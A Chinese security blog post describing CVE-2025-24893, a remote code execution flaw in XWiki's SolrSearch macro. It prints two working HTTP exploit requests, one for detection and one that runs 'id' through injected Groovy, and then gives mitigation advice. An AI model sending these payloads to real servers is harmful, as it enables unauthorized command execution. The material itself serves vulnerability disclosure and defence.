字数 261,阅读大约需 2 分钟
系统介绍
XWiki是一个开源的企业级Wiki系统,它不仅支持Wiki功能,还提供了构建协作式Web应用的能力。XWiki的开发平台特性允许创建协作式Web应用,同时也提供了构建于平台之上的打包应用(第二代wiki)。
漏洞概述
CVE-2025-24893是针对XWiki平台SolrSearchMacros组件的远程代码执行漏洞(RCE)。该漏洞源于对用户输入数据的未充分过滤,攻击者可利用Solr查询参数注入恶意代码,通过服务端模板引擎(如Velocity或Groovy)触发命令执行。
漏洞复现
检测POC
GET/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20(333%20%2B%20333))%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20%20HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
命令执行
GET/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Ddef%20command%20%3D%20%22id%22%3Bdef%20process%20%3D%20command.execute()%3Bprintln(%22Hello%20from%22%20%2B%20%22%20command%20output%3A%22%20%2B%20process.text.trim())%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7DHTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
修复建议
-
1. 升级最新版 -
2. 临时防护 #在xwiki.cfg 中禁用危险宏 rendering.restrictedParameters = velocity, groovy rendering.transformations = macro, icon, link
原文始发于微信公众号(南街老友):XWiki 远程代码执行漏洞|CVE-2025-24893
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论